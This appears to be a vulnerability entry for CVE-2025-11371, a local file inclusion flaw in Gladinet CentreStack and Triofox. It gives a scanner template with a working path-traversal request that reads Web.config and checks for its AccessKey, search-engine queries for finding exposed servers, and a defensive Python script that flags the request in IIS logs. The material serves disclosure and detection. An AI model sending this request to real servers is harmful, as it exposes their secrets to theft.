In the default installation and configuration of Gladinet CentreStack and Triofox, there is an unauthenticated Local File Inclusion flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: all versions prior to and including 16.7.10368.56560.
PoC code [public]
id: CVE-2025-11371
info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
  impact: |
    Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage.
  remediation: |
    Update to a version later than 16.7.10368.56560 or the latest available version.
  reference:
    - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md
    - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11371
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2025-11371
    cwe-id: CWE-552
    epss-score: 0.56996
    epss-percentile: 0.98021
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"CentreStack"
    fofa-query: "CentreStack - Login"
  tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev
http:
  - raw:
      - |
        GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<configuration>", "<system.web>", "AccessKey")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008e66a077174cbfe0f39250603cc3be47e5a623e539764778dd4a240a74ad6955022100b8113b43dc43f42f494935e4ed755dc14a221e7c2e2af6e90f559343d74e93c5:922c64590222798bb761d5b6d8e72950
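A log-review check for the request in the template above, as an added example that is not part of the original template or of any vendor tooling: it scans IIS W3C log lines for `/storage/t.dn` requests whose `s` parameter decodes to a `..` path segment, and records whether the server answered 200 (the status the template's matcher requires). The log lines, field order, client addresses and the benign `s` value are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS W3C log lines (documentation IPs), not from a real server.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-10-10 08:01:12 GET /favicon.ico - 198.51.100.7 200
2025-10-10 08:02:40 GET /storage/t.dn s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 203.0.113.9 200
2025-10-10 08:03:05 GET /storage/t.dn s=..%5c..%5c..%5cProgram+Files+(x86)%5cGladinet+Cloud+Enterprise%5croot%5cWeb.config&sid=1 203.0.113.44 404
2025-10-10 08:04:31 GET /storage/t.dn s=tmp_4f2a.dat&sid=1 198.51.100.7 200
"""

TARGET_STEM = "/storage/t.dn"                      # endpoint named in the template
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path segment


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide a '..' segment."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return one dict per logged request that matches the CVE-2025-11371 pattern."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != TARGET_STEM:
            continue
        for raw in parse_qs(row.get("cs-uri-query", "")).get("s", []):
            path = fully_decode(raw)
            if TRAVERSAL.search(path):
                hits.append({
                    "time": f'{row.get("date", "")} {row.get("time", "")}',
                    "client": row.get("c-ip", ""),
                    "path": path,
                    # 200 means the file was probably returned: treat as disclosure
                    "served": row.get("sc-status") == "200",
                })
    return hits
```

A hit with `served` set means the requested file was likely returned to the client, so any secrets in it (the template looks for `AccessKey` in `Web.config`) should be treated as exposed and rotated after patching.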